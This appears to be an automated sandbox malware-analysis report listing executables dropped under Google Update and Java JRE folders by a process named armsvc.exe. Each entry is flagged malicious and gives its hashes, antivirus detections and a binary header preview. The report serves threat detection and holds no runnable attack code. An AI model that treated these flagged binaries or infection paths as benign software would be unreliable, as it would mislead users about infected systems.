                                                                                                                                                  Malicious:true
                                                                                                                                                  Antivirus:
                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......|6..8W..8W..8W...%..6W...%...W...=...W...=...W...=..{W...%.. W...%..#W..8W...V..L<...W..L<s.9W..L<..9W..Rich8W..................PE..L...Y..d.....................r....................@...........................!......................................................0...2..............................T...........................h...@............................................text...e........................... ..`.rdata..b...........................@..@.data....'..........................@....rsrc....2...0...4..................@..@.reloc.......p......................@...........................................................................................................................................................................................................................................................................................................

                                                                                                                                                  C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1383936
                                                                                                                                                  Entropy (8bit):4.680834677021535
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:nE21BPt/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:E2bVLNiXicJFFRGNzj3
                                                                                                                                                  MD5:AE06F5E0FEC7D4EF1C3DE948218513DC
                                                                                                                                                  SHA1:684ACCF6C89DA805D92F61D84E8803B0133FBF71
                                                                                                                                                  SHA-256:1D618FDD02FD290C8E56A83C67B2EDE34DFFE8DCB36BF9D3EDF02A5ED5C08F67
                                                                                                                                                  SHA-512:D9EC943D015695C21D542B864E69506D234BCC0290EB175A312BD7B069BE49DB02EA2CD4799E0EB646F8CA79233C138B1D1008FF1E0738F3257D06809E306721
                                                                                                                                                  Malicious:true
                                                                                                                                                  Antivirus:
                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............Z...Z...Z..[..Z..[L..Z..[..Zu.[.Zu.[..Zu.[..Z..[..Z...Z...Z..[...Z..]Z...Z..5Z...Z..[...ZRich...Z........................PE..L...;..d..........................................@........................... ..............................................5..<....`..p2...........................+..T...........................h+..@............................................text...h........................... ..`.rdata...\.......^..................@..@.data........@.......0..............@....rsrc...p2...`...4...:..............@..@.reloc...p...........n..............@...........................................................................................................................................................................................................................................................................................

                                                                                                                                                  C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.134\117.0.5938.134_117.0.5938.132_chrome_updater.exe

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):2151936
                                                                                                                                                  Entropy (8bit):7.985856588637768
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:49152:CskVX3lfrFfR0BecCqKBs+4o8YhAWLNiXicJFFRGNzj3:CPR1frZRpcTKX4U7wRGpj3
                                                                                                                                                  MD5:2522E8C81BDAF17B16D7F1E4F91DD60F
                                                                                                                                                  SHA1:9AE76A8C36344C6C671580872F141B847B7B05AB
                                                                                                                                                  SHA-256:9E7D5DF42D9063245641E1FA4B536CE154BD61A28010F9433CFFF2BBC538ADBE
                                                                                                                                                  SHA-512:B731297A7E9DDCB30EA4A9AADA38BE2ED295CBE951288962AED248E670B3F7DC8AE163BE7B5FDF5D6B57FE554122139E9610FCCC8A3DD5480D2DB4D842FEA151
                                                                                                                                                  Malicious:true
                                                                                                                                                  Antivirus:
                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....|.e.........."......4.....................@.............................@!......1!... ..................................................X..P...............|....................W..............................PP..@............Z...............................text...&2.......4.................. ..`.rdata.......P.......8..............@..@.data...p....p.......N..............@....pdata..|............P..............@..@.00cfg..0............T..............@..@.retplne.............V...................rsrc................X..............@..@.reloc.......P......................@...........................................................................................................................................................................................................................................................................................................

                                                                                                                                                  C:\Program Files (x86)\Google\Update\Install\{6BB58CDD-A64E-41C8-8D92-79A516D3D118}\117.0.5938.134_117.0.5938.132_chrome_updater.exe

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):2151936
                                                                                                                                                  Entropy (8bit):7.9858569040174086
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:49152:3skVX3lfrFfR0BecCqKBs+4o8YhAWLNiXicJFFRGNzj3:3PR1frZRpcTKX4U7wRGpj3
                                                                                                                                                  MD5:AA703F55BA9E18206D8832E15528C683
                                                                                                                                                  SHA1:0603FE18E0F9ADD00640E92123EFA8F86458801B
                                                                                                                                                  SHA-256:732BB1D8556BAF1A8A491FDDB28AAEF35A85003C2CF68FEAA35D0DDF1F8342A3
                                                                                                                                                  SHA-512:06EC90775F61C20DD61C523A8C96F19D4B3A6166833D850D95BC38297094AE8847A9A8C73C9E30BCB918616BF9E952106F888E2BF239D7A8D679671534ED5B3F
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....|.e.........."......4.....................@.............................@!......;!... ..................................................X..P...............|....................W..............................PP..@............Z...............................text...&2.......4.................. ..`.rdata.......P.......8..............@..@.data...p....p.......N..............@....pdata..|............P..............@..@.00cfg..0............T..............@..@.retplne.............V...................rsrc................X..............@..@.reloc.......P......................@...........................................................................................................................................................................................................................................................................................................

                                                                                                                                                  C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1313792
                                                                                                                                                  Entropy (8bit):4.567737630702455
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12288:PViJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:P5/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
                                                                                                                                                  MD5:E9C0F1C062241B775FF1617D05689A0C
                                                                                                                                                  SHA1:052A29D147CAF86250D476C97E42DBABA0A7DA98
                                                                                                                                                  SHA-256:9E3360EC004FC83DC819D7BF102BC5BF0205A726BB24EF23C83A7DA37F1C0328
                                                                                                                                                  SHA-512:F3BD8928ACB2E10373762263B4CEC1478C18D84D52E5F118B98413155D7BC0E35EC80A04A3B05DEDB71B36E02784E0C6EF3D537C5954AA75553AF77BE3FBC34F
                                                                                                                                                  Malicious:true
                                                                                                                                                  Antivirus:
                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........8.C.VWC.VWC.VWJ..WS.VW!.WVA.VW!.SV\.VW!.RVO.VW!.UVB.VWW.WVJ.VWC.WW!.VW.SVB.VW..WB.VW.TVB.VWRichC.VW........PE..L.....d.................8...6.......4.......P....@.........................................................................$i.......................................b..T............................a..@............P...............................text....7.......8.................. ..`.rdata...#...P...$...<..............@..@.data...L............`..............@....rsrc................b..............@..@.reloc...`...........l..............@...........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                  C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1297920
                                                                                                                                                  Entropy (8bit):4.52884857486344
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12288:k2YiJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:9q/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
                                                                                                                                                  MD5:F60FBF6F33C4AA573EC47E55E8CC3416
                                                                                                                                                  SHA1:D8D5A04388845D92430858A50A1F9B6064E95E29
                                                                                                                                                  SHA-256:80CC37BB84B992A8E7A1221313C70ED96C518C1B8C1A233FE1024E4FD461DFE6
                                                                                                                                                  SHA-512:D278E39C03A7CC557EE8A0CDE2E13C81ED69A0D9AECDE6AC357F773E380AA750C4FF4DF6B0324951CAF1E46A704F870534F97E1D975BD7A756BC7996579741AA
                                                                                                                                                  Malicious:true
                                                                                                                                                  Antivirus:
                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@.................................8........................................&.......@..d...........................h"..T............................!..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0....... ..............@....rsrc...d....@......."..............@..@.reloc...`...P......................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                  C:\Program Files (x86)\Java\jre-1.8\bin\java.exe

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1530880
                                                                                                                                                  Entropy (8bit):4.994900023712343
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:bpwOtO7H/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:bmOtmHLNiXicJFFRGNzj3
                                                                                                                                                  MD5:352B56037ED5BF42745E58A214B65AE2
                                                                                                                                                  SHA1:1358ADC2768A0E0953A9E39863B8CA64AC301151
                                                                                                                                                  SHA-256:7D3C251E241069814D8043B292E00AADA14CCF5F5C235AB1F8197BB9D5C33621
                                                                                                                                                  SHA-512:25AB506C99729A30F4BFB911089D400940A12F8BE0A9B93C0E68735188DB8F1905E95DB4D5ED9BA8AAC53175460740DDFF952629C269622E16B23EB23E5CBAF4
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x..F<...<...<...(..3...(......(......^.F.;...^......^......^..)...(..5...<...N......3.....D.=......=...Rich<...........................PE..L.....d.................N...t....../........`....@..........................P".....mN.......................................!..d....P..............................P...T...............................@............`...............................text...\M.......N.................. ..`.rdata..@....`.......R..............@..@.data........0......................@....rsrc........P.......*..............@..@.reloc...p..........................@...........................................................................................................................................................................................................................................................................................

                                                                                                                                                  C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1368064
                                                                                                                                                  Entropy (8bit):4.635819287267484
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:01u/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:0QLNiXicJFFRGNzj3
                                                                                                                                                  MD5:9E4D1D65774446CEAC37E7B14DA78E19
                                                                                                                                                  SHA1:98C652C74DAC1D71C79F3F22A0B2D91688A5CE21
                                                                                                                                                  SHA-256:2672BC0E6763E92A506AC66A2D3508AC53A531A9144646470F44B31CE876A1EC
                                                                                                                                                  SHA-512:2E4ECB4CB39926B999BBB79368F3E12842C042F98B9C81860C5E924236DB2AEE6771156AEAA752A944046964982CD1F3C6B1DCA2EDDB7297A0F551789E173D4C
                                                                                                                                                  Malicious:true
                                                                                                                                                  Antivirus:
                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......VT.f.5.5.5.5.5.5.M\5.5.5pM.4.5.5pM.4.5.5pM.4.5.5.^.4.5.5.5.5.5.5pM.455.5.L.4.5.5.L05.5.5.L.4.5.5Rich.5.5........................PE..L.....d.................P...........K.......`....@..................................J......................................8...@......................................T...............................@............`...............................text....O.......P.................. ..`.rdata...g...`...h...T..............@..@.data...@...........................@....rsrc...............................@..@.reloc...`...p.......@..............@...........................................................................................................................................................................................................................................................................................................

                                                                                                                                                  C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1530880
                                                                                                                                                  Entropy (8bit):4.995587337285073
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:IKU/h/4KU/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:Ir/VULNiXicJFFRGNzj3
                                                                                                                                                  MD5:8BEBB4A3B0107376919D8CE777648ABB
                                                                                                                                                  SHA1:DC18DEFDBFE35529BEEF1B66363451D48BCE858B
                                                                                                                                                  SHA-256:3BE832D1D554CD5F5BEC94F32A31A0E6F16A519EA0006E775FB24E312CB7B95B
                                                                                                                                                  SHA-512:0843490B6C86B75714F1BF702510529FBEFF8EB94A69C84A84AF057F01302924E3633527CE2A40247CAC2E0460DDD0E08C1A615D06BF23F6582FE2030901E512
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9..#}..p}..p}..pi.qr..pi.q..pi.qo..p..}pz..p..qX..p..qo..p..qh..pi.qt..p}..p...p..qr..p...p|..p..q|..pRich}..p........................PE..L.....d.................N...t......7........`....@..........................P".....Y........................................!..d....P.............................P...T...............................@............`...............................text....M.......N.................. ..`.rdata..@....`.......R..............@..@.data........0......................@....rsrc.......P.......*..............@..@.reloc...p..........................@...........................................................................................................................................................................................................................................................................................

                                                                                                                                                  C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1669632
                                                                                                                                                  Entropy (8bit):5.069202713461549
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:Ax7YiBLZ05jNTmJWExj/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:AxUiHIjNgjLNiXicJFFRGNzj3
                                                                                                                                                  MD5:D4748E5EFB96960B70389676B809EB4F
                                                                                                                                                  SHA1:EC8C07FF749A0A6E8A5D8CF580DB6F4B2D975033
                                                                                                                                                  SHA-256:ACAF4F428134C591460B05A44AC918786BBF11690A6C7A9AF140AC49906F3420
                                                                                                                                                  SHA-512:87D93A0EF60A788DF3B21778B4FDE87059EB083649F082ABB296D17A4446C26B52B2757C4011F1F7C12FC984B18E429F176E0126A92E7C8AC76F6DD310BC7934
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......p...4rv.4rv.4rv. .u.>rv. .s..rv. .r.&rv.V.r.!rv.V.u.,rv.V.s..rv. .w.?rv.4rw..rv..r.&rv..s.0rv....5rv..t.5rv.Rich4rv.................PE..L.....d............................^.............@...........................%.....dQ..........................................x...................................L...T............................4..@...................,........................text...,........................... ..`.rdata..:(.......*..................@..@.data............t..................@....rsrc................:..............@..@.reloc.......0......................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                  C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1297920
                                                                                                                                                  Entropy (8bit):4.529288305371961
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12288:oorIiJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:zu/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
                                                                                                                                                  MD5:F31DACF8D9F1689A420268AA335C0969
                                                                                                                                                  SHA1:3C42CE0E7DDB1C4A39EBB6E4474947C01E05CE3A
                                                                                                                                                  SHA-256:28CCBE3ECF5F750B3AB6DB5D5E4E4A0AC38D7B2B4886185B3D1CBA147DD1624E
                                                                                                                                                  SHA-512:56FFD19AA7F0AFD6409108EDEAA59AD4C429A7ED5FEAA591DB6CE5A5189248D69834BEEC1334488F1092F778E05B92F8CCC60F1E2A2AB721B81B1B58E1F0F498
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@.................................y$.......................................&.......@..H............................"..T............................!..@............ ...............................text............................... ..`.rdata..6.... ......................@..@.data........0....... ..............@....rsrc...H....@......."..............@..@.reloc...`...P......................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                  C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1397760
                                                                                                                                                  Entropy (8bit):4.695173545067193
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:6dP/l/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:u9LNiXicJFFRGNzj3
                                                                                                                                                  MD5:D7F6B8A436E10C8FEE55A8E659376E42
                                                                                                                                                  SHA1:D3306FB922A9AD193EC3DE4AFB4D7F62538994ED
                                                                                                                                                  SHA-256:354AD431593B3545F3CEBAD1BF47F7115DF677C93B9364EE06B58BE68A75037F
                                                                                                                                                  SHA-512:3FB8C196992E5C88324F33F9AF22E3CA1C24C47E5853A6CA2BF2696C1F5E881C91BC7C0897A8E679A61F7F454320903D90138D0BBC6EF0130D2277BCC6818A2D
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<.$x..wx..wx..wq.uwn..wl..vp..w...v}..w...vu..w...v{..wx..w...w...v_..w...vy..w...vs..w...wy..w...vy..wRichx..w........PE..L...}.d..........................................@..........................` .....T...........................................h...................................`v..T............................u..@............................................text............................... ..`.rdata..R...........................@..@.data...P2..........................@....rsrc...............................@..@.reloc...p..........................@...................................................................................................................................................................................................................................................................................................................

                                                                                                                                                  C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exe

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1297920
                                                                                                                                                  Entropy (8bit):4.529320242418043
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12288:5Z5wiJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:H0/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
                                                                                                                                                  MD5:4893FD22ECE0D5B5B08E7D5F02A9629B
                                                                                                                                                  SHA1:14F05FEE35226CCA4CCFDDAA29608CEC5C8E35FA
                                                                                                                                                  SHA-256:8925A1AC30F7FEF29592BFABDE891B4827ABB9F8EB52BB214D900758E413CA84
                                                                                                                                                  SHA-512:926DD37D9D525A1F0CED80B2B4BA23795B669DA381650799B6AAE11637FB2D0541E5B1E0E5CDADAE2CD399BE38F28AEC00E9623F5F5517DB0642DC98C081019A
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@.................................CG.......................................&.......@..\............................"..T............................!..@............ ...............................text............................... ..`.rdata..>.... ......................@..@.data........0....... ..............@....rsrc...\....@......."..............@..@.reloc...`...P......................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                  C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exe

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1297920
                                                                                                                                                  Entropy (8bit):4.529374971331607
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12288:9ZlYiJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:34/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
                                                                                                                                                  MD5:FDDA6D84C588A3DA8E4F6978226808D8
                                                                                                                                                  SHA1:A075FC0DE4C370D542878B72596EB775E4BE8E20
                                                                                                                                                  SHA-256:1A8149D5466D0753E5E7D883B08F13C40E80DECD9C2A4514F18479FC780B999E
                                                                                                                                                  SHA-512:2FC6D5162902387BA2615B92849F43D98771636793EA4094B29D0507E849B702180233478699131551A968169CEAEC448535D6B4575CE4AD6EEFC799BAD58EE1
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................................................................&.......@..T............................"..T............................!..@............ ...............................text............................... ..`.rdata..>.... ......................@..@.data........0....... ..............@....rsrc...T....@......."..............@..@.reloc...`...P......................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                  C:\Program Files (x86)\Java\jre-1.8\bin\klist.exe

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1297920
                                                                                                                                                  Entropy (8bit):4.529374707106074
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12288:uNlYiJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:Q4/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
                                                                                                                                                  MD5:1960889C56479F2538F5002124449F50
                                                                                                                                                  SHA1:E47F4020B49050B0194EC1C4904514A294A10C51
                                                                                                                                                  SHA-256:2F75C33539037BF0197AA0A2A9E5F10BE3B7DE75411BA382012E5D9F66316706
                                                                                                                                                  SHA-512:F5AF762C2D7BEA88C36C5B1EA9629E1D2FB403DBE2E5A7EFF40939A661B6D7F56BB728A98C225BAE20381C14767D02363C5219260FD289FA1BA7824582CC8780
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..................................x.......................................&.......@..T............................"..T............................!..@............ ...............................text............................... ..`.rdata..>.... ......................@..@.data........0....... ..............@....rsrc...T....@......."..............@..@.reloc...`...P......................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                  C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exe

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1297920
                                                                                                                                                  Entropy (8bit):4.529353490025967
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12288:Kmm4iJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:lr/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
                                                                                                                                                  MD5:B125035D6D01497EC9460E4066C67FB6
                                                                                                                                                  SHA1:064F8B5F47912B143BA00FC06D7338BB8148DD60
                                                                                                                                                  SHA-256:F0F7D73A89BC36AD380FDC9FE4C71730E8C0DD118813759D8A552090AF9D5706
                                                                                                                                                  SHA-512:D29455C745BF211B6976317C4FCB201FA973FB5756F397DC978BF358559F41F1EE32C073F5737DB949CCEC598D751A7BD8822EE42E3166C0F772B7D631CD2594
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................................................................&.......@..P............................"..T............................!..@............ ...............................text............................... ..`.rdata..6.... ......................@..@.data........0....... ..............@....rsrc...P....@......."..............@..@.reloc...`...P......................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                  C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exe

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1297920
                                                                                                                                                  Entropy (8bit):4.530191949349729
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12288:wnmEiJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:an/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
                                                                                                                                                  MD5:A53EF06C47227C108986117FD480A6A8
                                                                                                                                                  SHA1:44D646F92573145D5C86E56331BCF283F7F5D582
                                                                                                                                                  SHA-256:7F3DDBED99161B2A43097C106B0BB9B76045B70F8F7AEA0CB717A4FDC5AEFA40
                                                                                                                                                  SHA-512:A93377E77135337A115FFDEB877661518E9840156042D9B659E9FF3E29E22908F8B93A531862B119C3666B32AF5D9B44B038000B927EA3733968F3690C56EE24
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@.........................................................................D'.......@..P........................... #..T...........................`"..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0....... ..............@....rsrc...P....@......."..............@..@.reloc...`...P......................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                  C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exe

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1297920
                                                                                                                                                  Entropy (8bit):4.529339204103891
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12288:+T5wiJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:OM/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
                                                                                                                                                  MD5:FD890001637DA83895F5532DA8FAB1DD
                                                                                                                                                  SHA1:C884AA3AB294F8D6CFC33E6E0133957373D44C74
                                                                                                                                                  SHA-256:FA019F4B7C36C09DAC627B160865C78614BA52D5B4FE9A439480A6A72FDD17B8
                                                                                                                                                  SHA-512:D63E970CED2F8F6F421CD412E27D826E6865E9C71C0ADB034920B1219EDC1C7D5EB2F4A202A3E11CA03EC7C3FF14DBB5891231E0D19BA6D0B8B8AE8C66781D62
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................................................................&.......@..\............................"..T............................!..@............ ...............................text............................... ..`.rdata..>.... ......................@..@.data........0....... ..............@....rsrc...\....@......."..............@..@.reloc...`...P......................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                  C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exe

                                                                                                                                                  Download File
